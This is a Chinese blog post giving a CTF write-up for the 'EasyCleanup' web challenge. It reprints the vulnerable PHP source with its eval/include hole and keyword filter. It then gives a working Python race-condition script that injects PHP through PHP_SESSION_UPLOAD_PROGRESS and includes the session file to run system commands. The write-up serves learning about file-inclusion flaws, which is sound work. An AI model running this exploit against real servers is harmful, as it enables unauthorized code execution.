EasyCleanup(session文件包含&条件竞争)

最新推荐文章于 2024-05-15 13:10:51 发布
最新推荐文章于 2024-05-15 13:10:51 发布
阅读量977 收藏 1
点赞数
分类专栏: CTF题目(web) 文章标签: php
原文链接:https://blog.csdn.net/m0_56059226/article/details/120445262?spm=1001.2014.3001.5501
版权

打开就是原码

<?php
 
if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}
 
 
if(isset($_GET['file'])){
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}
 
 
function filter($var): bool{
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];
 
    foreach($banned as $ban){
        if(strstr($var, $ban)) return True;
    }
 
    return False;
}
 
function checkNums($var): bool{
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $alphanum[$i]){
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}
 
?>


没什么发现,不过他叫传一个eval就可以查看phpinfo,那就先看看里面有什么。

 看到这里的时候,特别是session.upload.progress.enable这个开启时,就想到了当传入文件上去时,有办法可以进行rce。刚开始时想用条件竞争,直接就用脚本读出来了。

import io
import sys
import requests
import threading
host = 'http://114.115.134.72:32770/index.php'
sessid = 'aa'
def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('ls /');echo md5('1');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid},
        )
 
def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            break
 
with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)


但其实这道题不用条件竞争也可以做出来,因为session.upload_progress.cleanup没有开启,他不会及时的清理session文件,所以直接传文件,然后用题目中的include包含进去就可以了。

先构造一个传文件的表单,随便传一个文件抓包

 

1.首先构造的表单里面是没有cookie的,所以要自己加上一个cookie,phpsessid随便设置一个就可以,他会创建名为sess_PHPSESSID的文件。如果客户端未发送PHPSESSID,则创建一个由32个字母组成的PHPSESSID,并返回set-cookie。所以要知道文件名才能包含

2.当同时POST一个与session.upload_process.name的同名变量也就是PHP_SESSION_UPLOAD_PROGRESS。后端会自动将POST的这个同名变量作为键进行序列化然后存储到session文件中。通俗说就是会把内容序列化传入到session储存的文件中。

3.常见的php-session存放位置有:

/var/lib/php5/sess_PHPSESSID
/var/lib/php7/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSED

传包后访问session文件

没有问题,继续访问

再查看session文件 

 

 得到flag。

Kevin_xiao~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2021第五空间网络安全大赛
Huamang的博客
09-17 1148
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
TensorFlow Session会话控制&amp;Variable变量详解
09-20
今天小编就为大家分享一篇TensorFlow Session会话控制&amp;Variable变量详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
文件包含session条件竞争
qq_64318364的博客
12-04 564
session条件竞争,简单复现
预备-刷题记录二
plant1234的博客
03-29 1245
首先打开题目得到:分析代码发现第一个判断语句过滤了字母数字和一些字符,就可以考虑用取反,异化来绕过第二个判断限定了只能用函数的方式,并且函数里面不能有参数,例如:system() 或者 system(fun())能过判断所有是无参数,REC首先可以想到用php中的函数getallheaders()获取请求头current()获取第一键值。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 956
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
[第五空间 2021]EasyCleanup
ph0ebus的博客
02-03 1054
从一道赛题学习利用session.upload_progress实现恶意文件包含getshell
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 4万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
session.upload_progress文件包含
Aiwin的博客
05-29 797
session.upload_progress文件包含
NSS刷题记录web
a2303716126的博客
07-14 118
所以构造payload code=printf(`l\s /`);会发现一个目录ffffffff?审计代码,一顿乱分析,发现PHPinfo看到session临时文件上传。
session&amp;&amp;cookies实验
08-23
本实验一开始对Session会话是否存在进行判断&nbsp;建立Session---------之后通过登录向Session给值,实现了记录的功能--$_SESSION联合数组读取/存储所有session数据-退出的时候session删除 或者浏览器关闭时候自动删除)
php自定文件保存session的方法
10-25
主要介绍了php自定文件保存session的方法,详细讲述了session创建与使用的技巧,以及对应的作用范围分析,具有一定的参考借鉴价值,需要的朋友可以参考下
关于PHP中Session文件过多的问题及session文件保存位置
10-22
PHP的默认机制:每一次php请求,会有1/100的概率(默认值)触发&ldquo;session回收&rdquo;。接下来通过本文给大家介绍关于PHP中Session文件过多的问题及session文件保存位置,需要的朋友参考下
2021-第五空间智能安全大赛-Web-EasyCleanup
qq_53863234的博客
12-01 1564
打开后看到源码: &lt;?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) &gt; 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell)
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 4718
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup &lt;?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 4779
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 &lt;?php include("flag.php"); highlight_file(__
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 587
[第五空间 2021] wp
session条件竞争
qq_62046696的博客
12-11 507
PHP SESSION 的存储Session会话存储方式PHP将session文件的形式存储服务器的文件中,session.save_path来控制默认路径session文件默认是/var/lib/php/sessions目录下,文件名是sess_加上sessionID字段但是在赛题中大多数都是/tmp目录下,需要php.ini力sesion.auto_start设置为1,然后修改目录:如果开启这个选项,则PHP在接收请求的时候会,不再需要执行session_start()。
如何同步管理1000个设备的VLAN数据?
最新发布
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
session文件包含
08-08
一个会话文件session file)是指在一个特定的会话中记录和保存对话内容的文件。它可以包含用户的输入、机器人的回复以及其他相关的对话信息。 会话文件通常以文本文件的形式存储,并且可以在需要的时候被加载和使用。通过使用会话文件,用户可以保存一个对话的状态,并在之后的时间点继续与机器人进行交互,而不会丢失之前的对话历史。 会话文件对于开发聊天机器人非常有用,因为它可以帮助机器人记住用户之前的问题、上下文和答案,从而提供更连贯、个性化的回复。此外,会话文件还可以用于调试和分析对话流程,以便更好地改进机器人的性能和用户体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值